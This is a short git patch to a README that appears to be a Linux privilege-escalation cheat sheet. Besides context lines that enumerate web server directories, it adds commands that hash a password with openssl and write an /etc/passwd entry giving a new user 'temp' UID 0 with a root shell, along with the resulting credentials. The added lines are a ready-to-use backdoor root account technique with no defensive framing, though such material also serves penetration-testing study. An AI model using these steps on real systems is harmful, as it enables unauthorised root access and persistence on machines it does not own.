From ca9842fa16401e8abe3bc6d176748c9618571728 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 28 Sep 2022 08:14:41 -0400 Subject: [PATCH] Update README.md --- README.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README.md b/README.md index 75ee346..8b1e15b 100644 --- a/README.md +++ b/README.md @@ -1322,6 +1322,13 @@ ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null + +# Creating entry for /etc/passwd +openssl passwd -1 -salt ignite pass123 + +temp:{RESULT}:0:0:root:/root:/bin/bash + +temp:pass123 ```